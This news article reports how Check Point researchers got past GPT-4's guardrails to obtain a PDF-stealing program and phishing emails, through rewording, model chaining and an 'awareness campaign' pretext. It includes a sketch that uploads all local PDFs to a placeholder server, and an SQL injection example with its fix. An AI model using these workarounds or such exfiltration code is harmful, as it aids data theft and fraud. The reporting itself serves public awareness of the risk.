OpenAI’s long-awaited GPT-4 makes the unprecedented danger of artificial intelligence tangible on a global scale

Researchers claim they tricked it into creating malware and helping them craft phishing emails. The prospect of a new era of high-speed, high-performance cybercrime worries specialists.
18 March 2023, 17:41
OpenAI released the latest version of its machine learning software, GPT-4, with great fanfare this week. One of the features the company highlighted in the new version was that it was supposed to have guardrails preventing cybercriminals from misusing it. Within days, however, researchers claim they tricked it into creating malware and helping them craft phishing emails, just as they had done with the previous iteration of OpenAI’s software, ChatGPT.
On the plus side, they were also able to use the software to plug holes in cyber defenses. Researchers at the cybersecurity company Check Point showed Forbes how they got around OpenAI’s block on malware development simply by removing the word “malware” from a request. GPT-4 then helped them create software that collects PDF files and sends them to a remote server.
The model went further, giving the researchers tips on how to get the program running on a Windows 10 PC and how to shrink it into a smaller file, so it could run faster and stand less chance of being detected by security software.
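The Check Point report does not reproduce the generated code, but the functionality described is rudimentary. As a rough, benign sketch, assuming a hypothetical upload.example.com endpoint (an illustration, not anything from the report), a script with that behavior could be as short as this:

    import pathlib
    import requests  # third-party HTTP client: pip install requests

    # Hypothetical address used purely for illustration.
    SERVER_URL = "https://upload.example.com/collect"

    def collect_pdfs(root: str) -> list[pathlib.Path]:
        # Recursively find every PDF under the given directory.
        return list(pathlib.Path(root).rglob("*.pdf"))

    def send_to_server(paths: list[pathlib.Path]) -> None:
        # POST each file's contents to the remote server.
        for path in paths:
            with path.open("rb") as handle:
                requests.post(SERVER_URL, files={"file": (path.name, handle)})

    if __name__ == "__main__":
        send_to_server(collect_pdfs("."))

That the whole program amounts to a dozen lines of ordinary Python, the same code any backup tool would use, is precisely why researchers worry about the barrier to entry being lowered.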
How they got around GPT-4’s barriers
To get GPT-4 to help create phishing emails, the researchers took two approaches. In the first, they used GPT-3.5, which did not block requests to create malicious messages, to write a phishing email impersonating a legitimate bank.

They then asked GPT-4, which had initially refused to create an original phishing message, to improve the language. In the second approach, they asked for advice on creating a phishing awareness campaign for a company and requested a template for a fake phishing email, which the tool duly provided.

“GPT-4 can provide bad actors, even non-technical ones, with the tools to speed up and validate their activity,” Check Point researchers say in their report, shared with Forbes ahead of publication. “What we are seeing is that GPT-4 can serve both good and bad actors. Good actors can use GPT-4 to craft and stitch together code that is useful to society; but simultaneously, bad actors can use this artificial intelligence (AI) technology for the rapid execution of cybercrime.”

Check Point Report Details
Sergey Shykevich, threat intelligence group manager at Check Point, said the barriers preventing GPT-4 from generating phishing or malicious code actually appeared lower than in previous versions. He suggested this may be because the company is relying on the fact that only premium users currently have access. Even so, he added, OpenAI should have anticipated such workarounds. “I think they are trying to prevent and reduce them, but it is a game of cat and mouse,” he said.

Daniel Cuthbert, a cybersecurity researcher and member of the Black Hat hacking conference review board, says GPT-4 could help those with little technical knowledge build malicious tools. “If you’re really bad at this, it helps a lot. It puts it on a plate for you,” he says.
But cybersecurity experts hired by OpenAI to test its chatbot before release found that it had “significant limitations for cybersecurity operations,” according to the paper. “It does not improve upon existing tools for reconnaissance, vulnerability exploitation and network navigation, and is less effective than existing tools for complex and high-level activities, such as identifying new vulnerabilities,” OpenAI wrote. However, the hackers found that GPT-4 “was effective in writing realistic social engineering content.”
“To mitigate potential misuse in this area, we are training models to refuse malicious cybersecurity requests and scaling our internal safety systems, including monitoring, detection, and response,” OpenAI added in the paper.
The company did not respond to requests for comment about why Check Point researchers were able to quickly circumvent some of those mitigations.
Although it can be easy to fool the OpenAI models, “it doesn’t do anything that hasn’t been done before,” says Cuthbert. A good hacker will already know how to do much of what OpenAI can do without artificial help, he says. And modern detection systems should also be able to detect the types of malware that ChatGPT helps create, given that it learned from previous examples seen on the Internet, he adds.
Cuthbert is excited about what GPT-4 can do for defense. After it helped him find bugs in his software, it also gave him quick fixes with real code snippets that he could copy and paste into his program, repairing it in seconds. “I really like the auto-refactoring,” he says. “The future is great.”
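Forbes does not show the fixes Cuthbert received, so the following before-and-after is a hypothetical example in the same spirit, assuming the flagged bug is a classic SQL injection and the suggested patch is a parameterized query:

    import sqlite3

    # Flawed original: user input is concatenated straight into the SQL
    # string, so input like "x' OR '1'='1" rewrites the query itself.
    def find_user_unsafe(conn: sqlite3.Connection, username: str):
        query = "SELECT id, username FROM users WHERE username = '" + username + "'"
        return conn.execute(query).fetchall()

    # Suggested fix: a "?" placeholder makes the database driver treat the
    # input strictly as data, never as SQL, closing the injection hole.
    def find_user_safe(conn: sqlite3.Connection, username: str):
        return conn.execute(
            "SELECT id, username FROM users WHERE username = ?", (username,)
        ).fetchall()

The appeal Cuthbert describes is that such a patch arrives as ready-to-paste code rather than as a prose explanation of the flaw.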
*With information from Forbes US.